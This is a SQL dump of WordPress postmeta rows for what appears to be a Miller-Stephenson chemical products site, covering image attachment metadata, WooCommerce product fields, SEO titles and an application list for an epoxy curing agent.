INSERT INTO `wp_postmeta` VALUES (18549, 1985, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/09/EPIKURE-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPIKURE-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPIKURE-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPIKURE-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPIKURE-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPIKURE-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18550, 1191, '_thumbnail_id', '1985'); 
INSERT INTO `wp_postmeta` VALUES (18551, 1191, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18552, 1986, '_wp_attached_file', '2016/08/EPIKURE-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18553, 1986, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/EPIKURE-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPIKURE-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPIKURE-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPIKURE-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPIKURE-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPIKURE-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18554, 1063, '_thumbnail_id', '1986'); 
INSERT INTO `wp_postmeta` VALUES (18555, 1063, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18556, 1065, '_thumbnail_id', '1984'); 
INSERT INTO `wp_postmeta` VALUES (18557, 1065, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18558, 1178, '_thumbnail_id', '1986'); 
INSERT INTO `wp_postmeta` VALUES (18559, 1178, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18560, 1181, '_thumbnail_id', '1986'); 
INSERT INTO `wp_postmeta` VALUES (18561, 1181, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18562, 1067, '_thumbnail_id', '1984'); 
INSERT INTO `wp_postmeta` VALUES (18563, 1067, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18564, 1987, '_wp_attached_file', '2016/09/3253.pdf'); 
INSERT INTO `wp_postmeta` VALUES (18565, 1865, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (18566, 1865, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (18567, 1865, '_thumbnail_id', '1984'); 
INSERT INTO `wp_postmeta` VALUES (18568, 1865, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18569, 1865, '716_default_editor', 'Application Areas/Suggested Uses\r\n<ul>\r\n 	<li>Accelerator for epoxy resin curing agents</li>\r\n 	<li>Catalyst for polyurethane elastomers</li>\r\n 	<li>Catalyst for isocyanurate foams</li>\r\n 	<li>Catalyst for isocyanate trimerization</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (18570, 1865, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18571, 1865, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18572, 1865, '318_custom_list_file', 'a:2:{s:32:"feb22e86e7621fc69434fcf0a1b2e976";a:3:{s:4:"name";s:12:"EPIKURE 3253";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3253.pdf";s:4:"desc";s:16:"EPIKURE 3253 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (18573, 1865, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18574, 1865, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (18575, 1865, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (18576, 1865, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18577, 1865, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18578, 1865, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (18579, 1865, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18580, 1865, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (18581, 1865, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (18582, 1865, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (18583, 1865, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (18584, 1865, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (18585, 1865, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18586, 1865, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18587, 1865, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18588, 1865, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (18589, 1865, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (18590, 1865, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18591, 1865, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (18592, 1865, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18593, 1865, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18594, 1865, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (18595, 1865, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18596, 1865, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18597, 1865, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (18598, 1865, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (18599, 1988, '_wp_attached_file', '2016/08/EPIREZ-3522-W-60.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18600, 1988, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:28:"2016/08/EPIREZ-3522-W-60.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"EPIREZ-3522-W-60-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"EPIREZ-3522-W-60-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"EPIREZ-3522-W-60-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"EPIREZ-3522-W-60-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"EPIREZ-3522-W-60-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"EPIREZ-3522-W-60-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"EPIREZ-3522-W-60-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"EPIREZ-3522-W-60-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18601, 1031, '_thumbnail_id', '1988'); 
INSERT INTO `wp_postmeta` VALUES (18602, 1031, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18603, 1989, '_wp_attached_file', '2016/08/EPIREZ-5003-W-55.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18604, 1989, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:28:"2016/08/EPIREZ-5003-W-55.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"EPIREZ-5003-W-55-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"EPIREZ-5003-W-55-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"EPIREZ-5003-W-55-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"EPIREZ-5003-W-55-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"EPIREZ-5003-W-55-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"EPIREZ-5003-W-55-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"EPIREZ-5003-W-55-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"EPIREZ-5003-W-55-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18605, 1033, '_thumbnail_id', '1989'); 
INSERT INTO `wp_postmeta` VALUES (18606, 1033, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18607, 1990, '_wp_attached_file', '2016/08/EPIREZ-5522-WY-55.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18608, 1990, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:29:"2016/08/EPIREZ-5522-WY-55.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"EPIREZ-5522-WY-55-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"EPIREZ-5522-WY-55-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"EPIREZ-5522-WY-55-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"EPIREZ-5522-WY-55-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"EPIREZ-5522-WY-55-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"EPIREZ-5522-WY-55-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"EPIREZ-5522-WY-55-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"EPIREZ-5522-WY-55-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18609, 1035, '_thumbnail_id', '1990'); 
INSERT INTO `wp_postmeta` VALUES (18610, 1019, '_thumbnail_id', '1924'); 
INSERT INTO `wp_postmeta` VALUES (18611, 1019, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18612, 955, '_thumbnail_id', '1924'); 
INSERT INTO `wp_postmeta` VALUES (18613, 955, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18614, 924, '_thumbnail_id', '1924'); 
INSERT INTO `wp_postmeta` VALUES (18615, 924, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18616, 918, '_thumbnail_id', '1924'); 
INSERT INTO `wp_postmeta` VALUES (18617, 918, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18620, 64, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (18621, 1995, '_wp_attached_file', '2016/09/Vazo-logo-4.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18622, 1995, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:23:"2016/09/Vazo-logo-4.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"Vazo-logo-4-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"Vazo-logo-4-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"Vazo-logo-4-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"Vazo-logo-4-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18623, 1997, '_wp_attached_file', '2016/09/MS-224-TRIGGER-SPRAY.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18624, 1997, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:32:"2016/09/MS-224-TRIGGER-SPRAY.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"MS-224-TRIGGER-SPRAY-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"MS-224-TRIGGER-SPRAY-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"MS-224-TRIGGER-SPRAY-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"MS-224-TRIGGER-SPRAY-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"MS-224-TRIGGER-SPRAY-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"MS-224-TRIGGER-SPRAY-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"MS-224-TRIGGER-SPRAY-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"MS-224-TRIGGER-SPRAY-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18625, 1852, '_thumbnail_id', '1997'); 
INSERT INTO `wp_postmeta` VALUES (18626, 1164, '_thumbnail_id', '1986'); 
INSERT INTO `wp_postmeta` VALUES (18627, 1164, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18628, 1166, '_thumbnail_id', '1986'); 
INSERT INTO `wp_postmeta` VALUES (18629, 1166, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18630, 1168, '_thumbnail_id', '1986'); 
INSERT INTO `wp_postmeta` VALUES (18631, 1168, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18636, 1135, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (18645, 2001, '_wp_attached_file', '2016/08/Vapor-Degreaser.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18646, 2001, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:680;s:6:"height";i:498;s:4:"file";s:27:"2016/08/Vapor-Degreaser.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"Vapor-Degreaser-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"Vapor-Degreaser-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"Vapor-Degreaser-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"Vapor-Degreaser-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"Vapor-Degreaser-510x498.jpg";s:5:"width";i:510;s:6:"height";i:498;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18647, 1135, '_thumbnail_id', '2001'); 
INSERT INTO `wp_postmeta` VALUES (18652, 1135, '_aioseop_title', 'Opteon SionDegreaserDegreasingVapor'); 
INSERT INTO `wp_postmeta` VALUES (18653, 2002, '_wp_attached_file', '2016/08/Vapor-Degreaser-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18654, 2002, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:680;s:6:"height";i:498;s:4:"file";s:29:"2016/08/Vapor-Degreaser-1.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"Vapor-Degreaser-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"Vapor-Degreaser-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"Vapor-Degreaser-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"Vapor-Degreaser-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"Vapor-Degreaser-1-510x498.jpg";s:5:"width";i:510;s:6:"height";i:498;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18659, 1121, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (18661, 1121, '_aioseop_noindex', 'on'); 
INSERT INTO `wp_postmeta` VALUES (18662, 1525, '_thumbnail_id', '1554'); 
INSERT INTO `wp_postmeta` VALUES (18667, 1525, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (18669, 1601, '_thumbnail_id', '1606'); 
INSERT INTO `wp_postmeta` VALUES (18674, 1601, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (18681, 1601, '_aioseop_title', 'VAZO Free Radical Initiators'); 
INSERT INTO `wp_postmeta` VALUES (18687, 1525, '_aioseop_title', 'Mold Release Agents: Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (18688, 1871, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (18689, 22, '_edit_lock', '1475500134:3'); 
INSERT INTO `wp_postmeta` VALUES (18692, 50, '_wp_attachment_image_alt', 'Krytox Reseller'); 
INSERT INTO `wp_postmeta` VALUES (18701, 120, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (18702, 120, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (18703, 120, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (18716, 347, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (18717, 347, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 200'); 
INSERT INTO `wp_postmeta` VALUES (18718, 347, '_yoast_wpseo_focuskw', 'Krytox GPL 200'); 
INSERT INTO `wp_postmeta` VALUES (18719, 347, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (18720, 347, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (18721, 769, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (18722, 769, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 201'); 
INSERT INTO `wp_postmeta` VALUES (18723, 769, '_yoast_wpseo_focuskw', 'Krytox GPL 201'); 
INSERT INTO `wp_postmeta` VALUES (18724, 769, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (18725, 769, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (18726, 64, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (18727, 64, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (18729, 452, '_yoast_wpseo_title', 'Krytox 143AZ Aerospace Oil'); 
INSERT INTO `wp_postmeta` VALUES (18730, 579, '_yoast_wpseo_title', 'Krytox 143AA Aerospace Oil'); 
INSERT INTO `wp_postmeta` VALUES (18731, 580, '_yoast_wpseo_title', 'Krytox 143AY Aerospace Oil'); 
INSERT INTO `wp_postmeta` VALUES (18732, 581, '_yoast_wpseo_title', 'Krytox 143AB Aerospace Oil'); 
